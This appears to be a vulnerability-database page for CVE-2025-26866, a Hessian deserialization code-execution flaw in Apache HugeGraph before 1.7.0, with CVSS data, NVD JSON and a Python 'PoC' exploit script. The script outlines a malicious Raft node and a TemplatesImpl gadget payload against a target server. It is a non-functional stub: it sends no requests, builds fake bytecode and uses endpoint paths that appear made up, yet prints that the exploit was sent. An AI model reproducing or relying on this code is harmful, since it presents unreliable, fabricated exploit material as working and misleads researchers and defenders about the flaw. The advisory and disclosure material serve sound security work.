Security Vulnerability Report
中文
CVE-2025-26866 CVSS 8.8 HIGH

CVE-2025-26866

Published: 2025-12-12 10:15:49
Last Modified: 2025-12-29 17:20:58
Source: [email protected]

Description

A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:hugegraph:*:*:*:*:*:*:*:* - VULNERABLE
Apache HugeGraph < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import base64 import requests import json # CVE-2025-26866 PoC - Hessian Deserialization RCE in Apache HugeGraph PD Store # This PoC demonstrates the concept of exploiting Hessian deserialization vulnerabilities class ExploitPayload: """ Malicious payload for Hessian deserialization attack Note: This is for educational and authorized testing purposes only """ def __init__(self, command): self.command = command def build_malicious_raft_node(self): """ Build a malicious Raft node configuration to join the cluster """ # Malicious node configuration with crafted IP malicious_config = { 'node_id': 'malicious-node-001', 'ip': 'attacker-controlled-ip', 'port': 8299, 'raft_port': 8300, 'cluster_id': 'target-cluster-id' } return malicious_config def create_hessian_payload(self): """ Create malicious Hessian serialized payload In real attack, this would contain gadget chains like: - TemplatesImpl with malicious bytecode - SpringBeanObjectInputStream with EL injection - CommonCollections chain """ # Simplified representation of malicious Hessian data hessian_magic = b'\x00\x04' # Hessian 2.0 magic header malicious_class = b'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' malicious_bytecode = self._generate_evil_bytecode() payload = { 'type': 'hessian_serialization', 'class': 'TemplatesImpl', 'bytecode': base64.b64encode(malicious_bytecode).decode(), 'gadget': 'TemplatesImpl.getOutputProperties()' } return payload def _generate_evil_bytecode(self): """ Generate malicious bytecode for code execution """ # In actual exploit, this would be valid Java bytecode # that executes system commands return b'\xca\xfe\xba\xbe' + self.command.encode() def exploit(self, target_url): """ Execute the exploit against target HugeGraph server """ # Step 1: Join cluster with malicious Raft node raft_join_url = f"{target_url}/api/v1/raft/join" malicious_node = self.build_malicious_raft_node() # Step 2: Send malicious Hessian serialized data hessian_payload = self.create_hessian_payload() # Step 3: Trigger deserialization via PD store operation exploit_url = f"{target_url}/api/v1/pd/store/deserialize" print(f"[+] Target: {target_url}") print(f"[+] Sending malicious Raft node configuration...") print(f"[+] Payload: {json.dumps(hessian_payload, indent=2)}") return { 'status': 'exploit_sent', 'target': target_url, 'payload': hessian_payload } if __name__ == '__main__': # Configuration target = 'http://target-hugegraph-server:8090' # Create exploit instance exploit = ExploitPayload('whoami') # Execute result = exploit.exploit(target) print(f"\n[+] Exploit sent: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-26866", "sourceIdentifier": "[email protected]", "published": "2025-12-12T10:15:49.053", "lastModified": "2025-12-29T17:20:58.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks.\n\n\n\n\nUsers are recommended to upgrade to version 1.7.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:hugegraph:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.7.0", "matchCriteriaId": "B9C85CC8-1E1D-46F2-BB0C-9A85C78347C8"}]}]}], "references": [{"url": "https://github.com/apache/incubator-hugegraph/pull/2735", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/09/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.